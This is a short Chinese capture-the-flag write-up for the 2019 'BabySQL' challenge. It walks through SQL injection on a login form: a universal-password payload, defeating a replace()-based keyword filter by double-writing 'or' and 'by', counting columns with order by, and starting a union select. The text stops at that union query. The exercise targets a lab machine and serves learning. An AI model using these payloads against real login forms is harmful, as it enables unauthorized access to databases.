[极客大挑战 2019]BabySQL
wp from Kuller_Yan
打开靶机,熟悉的极客大挑战界面
先尝试万能密码1' or 1=1 #
显示ERROER
但是仔细观察报错语句,似乎没有看到or
猜测后端使用replace()
函数过滤,尝试双写or:1' oorr 1=1 #
正常回显,看来我们猜测的不错。
然后测试字段数:1' order by 3 #;
ERROR ,尴尬,忘记了order里面也有or,而且by也被过滤了,所以双写:1' oorrder bbyy 3 #
,回显正常,试下4:1' oorrder bbyy 4 #
说明字段数量为 3;
然后就是按流程
进行联合查询;1' union select 1,2,database() #